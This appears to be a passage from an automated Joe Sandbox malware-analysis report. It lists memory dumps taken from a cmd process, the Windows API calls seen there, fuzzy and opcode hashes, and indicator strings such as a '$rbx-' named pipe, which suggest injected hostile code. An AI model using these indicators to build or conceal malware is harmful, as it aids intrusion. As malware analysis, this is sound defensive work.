                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                              • String ID: \\.\pipe\$rbx-childproc
                              • API String ID: 166002920-1828357524
                              • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction ID: fe20daf8bd62df155d6631efef9522a88d9cb0d58ad5dc565e79c52aa84ddf57
                              • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction Fuzzy Hash: 03114C76624B40D2EB10DFA1F51835A7BA0F789BD8F944315EE9D0AAA8CF7CC194CB40
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                              • String ID:
                              • API String ID: 190073905-0
                              • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction ID: 1b4f91bb85a36d3def507e0d1a99e8efdcc441173878d2c003b43c2c962ef5c1
                              • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction Fuzzy Hash: 2B81C221734641B6FE60BBE5944936D7F99AB857ACF584015AE0C5F39EDB38C8F28700
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd
                              Similarity
                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                              • String ID:
                              • API String ID: 190073905-0
                              • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction ID: b0b18b4bf853309e175d2e328a58c0d3972fba0d07a07fa84aa3ecb16d0f3746
                              • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction Fuzzy Hash: 0481B020B002C5A6FF54BFE9A8493997ED0AB8678CF454125BA0D4F7D6DB38E8F58700
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                              • String ID:
                              • API String ID: 190073905-0
                              • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction ID: 67e8024c7c5263d3cf412bcbdd954e222507aed034267331d3a21a5c711f4c60
                              • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction Fuzzy Hash: 6781D2A1634241B6FE50BBF6964D3AE7E91AB8578CF444015AE4C4F7BEDB38C8E58700
                              APIs
                              • LoadLibraryExW.KERNEL32(?,?,?,0000022413909C6B,?,?,?,000002241390945C,?,?,?,?,0000022413908F65), ref: 0000022413909B31
                              • GetLastError.KERNEL32(?,?,?,0000022413909C6B,?,?,?,000002241390945C,?,?,?,?,0000022413908F65), ref: 0000022413909B3F
                              • LoadLibraryExW.KERNEL32(?,?,?,0000022413909C6B,?,?,?,000002241390945C,?,?,?,?,0000022413908F65), ref: 0000022413909B69
                              • FreeLibrary.KERNEL32(?,?,?,0000022413909C6B,?,?,?,000002241390945C,?,?,?,?,0000022413908F65), ref: 0000022413909BD7
                              • GetProcAddress.KERNEL32(?,?,?,0000022413909C6B,?,?,?,000002241390945C,?,?,?,?,0000022413908F65), ref: 0000022413909BE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Library$Load$AddressErrorFreeLastProc
                              • String ID: api-ms-
                              • API String ID: 2559590344-2084034818
                              • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction ID: ad41c0798bd4152d8d46be93dc164ef646207a785e0e9ae7bcaf201a17ac7487
                              • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction Fuzzy Hash: 1031A321322741E1EE51FB8698087A53BD8B744BB8F5A0625DD1D4F7A8EF38C4E4C310
                              APIs
                              • LoadLibraryExW.KERNEL32(?,?,?,0000022413939C6B,?,?,?,000002241393945C,?,?,?,?,0000022413938F65), ref: 0000022413939B31
                              • GetLastError.KERNEL32(?,?,?,0000022413939C6B,?,?,?,000002241393945C,?,?,?,?,0000022413938F65), ref: 0000022413939B3F
                              • LoadLibraryExW.KERNEL32(?,?,?,0000022413939C6B,?,?,?,000002241393945C,?,?,?,?,0000022413938F65), ref: 0000022413939B69
                              • FreeLibrary.KERNEL32(?,?,?,0000022413939C6B,?,?,?,000002241393945C,?,?,?,?,0000022413938F65), ref: 0000022413939BD7
                              • GetProcAddress.KERNEL32(?,?,?,0000022413939C6B,?,?,?,000002241393945C,?,?,?,?,0000022413938F65), ref: 0000022413939BE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Library$Load$AddressErrorFreeLastProc
                              • String ID: api-ms-
                              • API String ID: 2559590344-2084034818
                              • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction ID: 57c064d97f865205982df99bcbef5c6721ec4a37e439091be98df3e775df499f
                              • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction Fuzzy Hash: EE31A561322641E1EE11BBA69A087A53BA4BB44BA8F590625DD1D4F7A8DF38C4A4C310
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                              • String ID: CONOUT$
                              • API String ID: 3230265001-3130406586
                              • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction ID: 0884e7989a5f56012b23c56e7d75e5b62d28f3adea894febd1c847cc45763932
                              • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction Fuzzy Hash: 38115421320A4096EB51DB92E8587197BA1F788BF8F454214DD5E5BB98CF38C8648740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                              • String ID: CONOUT$
                              • API String ID: 3230265001-3130406586
                              • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction ID: 1d1f50bd10ef7023ba4348249dd928e17c740b71aa574e2381e0ff86f82270ad
                              • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction Fuzzy Hash: BA118631330B4096EB51ABD2F9987197BA0F788FE8F444214EE5D8BB98DF38C4A48740
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Thread$Current$Context
                              • String ID:
                              • API String ID: 1666949209-0
                              • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction ID: a78d9c73553896ecf604a6a849edbf95b5085880193b2b6bf495002e49aaaf32
                              • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction Fuzzy Hash: 9CD18B76214B8891DE70EB5AE49835A7BA5F388B9CF100116EECD4B7A9DF3CC591CB40
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Thread$Current$Context
                              • String ID:
                              • API String ID: 1666949209-0
                              • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction ID: 2bdfaf704aa1fd5d0113448785289009c65c2e9ee025ad077e29eddc49b2fa15
                              • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction Fuzzy Hash: 4AD18B76218B8891DE70AB5AE59835A7BA0F788B9CF100116EECD4B779DF3CC591CB40
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Free$CurrentThread
                              • String ID:
                              • API String ID: 564911740-0
                              • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction ID: 64b904e8e699d37342e973c6215fec607383fd6f471c97baf5dcb264f71426c3
                              • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction Fuzzy Hash: FC51D678221F45B5EF45FBA8D8592953BA9BB0474CF840825ED9C4A3ADEF74C5B8C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Free$CurrentThread
                              • String ID:
                              • API String ID: 564911740-0
                              • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction ID: 468bf2887889efb7b264cf0fddcce4d9f8c2ebba3b49529906542ef36a2f8385
                              • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction Fuzzy Hash: 7151E6B0222B45B5EF15FBA4DA592943BA1BB0874CF800816AD5C0A7BDEF74C5F4C340
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID: $rbx-
                              • API String ID: 756756679-3661604363
                              • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction ID: dacea7f78df401267ef24646c8c44b79f733736f56c51c88b16c05ddf8dbdb9a
                              • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction Fuzzy Hash: 6531A421721B55A2EE91FF96E58932A7B94FB44B88F084020CF4C0BB59EF34C8F18700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID: $rbx-
                              • API String ID: 756756679-3661604363
                              • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction ID: 4054e640204b09c5ceb1a67b713e58fa3a641998a15135bf51272e6a433aa670
                              • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction Fuzzy Hash: AC319361761B55A6EE50FFA6D6892697BA0BB44B8CF0840208F4C0BB69EF34C4F18700
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: ErrorLast$Value$FreeHeap
                              • String ID:
                              • API String ID: 365477584-0
                              • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction ID: 73859780a70b5d47c9c156c4bf445129e90d169c579b8ff824d51ec78ed383cd
                              • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction Fuzzy Hash: 5611772133078062FE54B7F5645D36E3A5A9B857ACF544624AC6F5E3CECE38C8E14700
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: ErrorLast$Value$FreeHeap
                              • String ID:
                              • API String ID: 365477584-0
                              • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction ID: 9a89fe46c5e97ff38c11a66a76c55e0e3d0bd114bb149d782d44bb708ce91cf0
                              • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction Fuzzy Hash: AD119896334681A1FE1477F2671D36E3D515B84798F544524AC5F5E7EECD28C8F14700
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID:
                              • API String ID: 517849248-0
                              • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction ID: c0a3b6a09fb925a5add5b0a1d2986aa8e1ee5e029dfafc02e8a54fdd4d366d1c
                              • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction Fuzzy Hash: 1E018B61720A4092EA10EB92A88834977A1F788FD8F894034DE4D57758DF38C996C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID:
                              • API String ID: 517849248-0
                              • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction ID: 8e67b5a141409fd048b4dbc2385198524401762d670e2bf2ead7599378418e12
                              • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction Fuzzy Hash: 50015B65720A4092EE20EBA2E95835977A1F788FC8F484034DE4D87B68DE38C995C740
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                              • String ID:
                              • API String ID: 449555515-0
                              • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction ID: a00d2c6ae47c2e80c689bb35f0f152edc1bee7607894d45dcc6afd9ac796b98c
                              • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction Fuzzy Hash: C9011B69221B40D2EF24EBA1E84C7167BA4AB45B59F080024CE4D1A36CEF3DC9A8C700
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                              • String ID:
                              • API String ID: 449555515-0
                              • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction ID: a5b292c7cf9d069f3b258e9537cd8b6052efdc237937ba094c80e6ceae999238
                              • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction Fuzzy Hash: 59011BA9221740D2EF34ABE1E94C7157BA0AB45B49F040025CD4D0A76CEF3DC4E8C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: FinalHandleNamePathlstrlen
                              • String ID: \\?\
                              • API String ID: 2719912262-4282027825
                              • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                              • Instruction ID: fb3fd3352bb2d8e6ba2f9927d31222ee6532609a58683f9ec4c8d094aff9dcec
                              • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
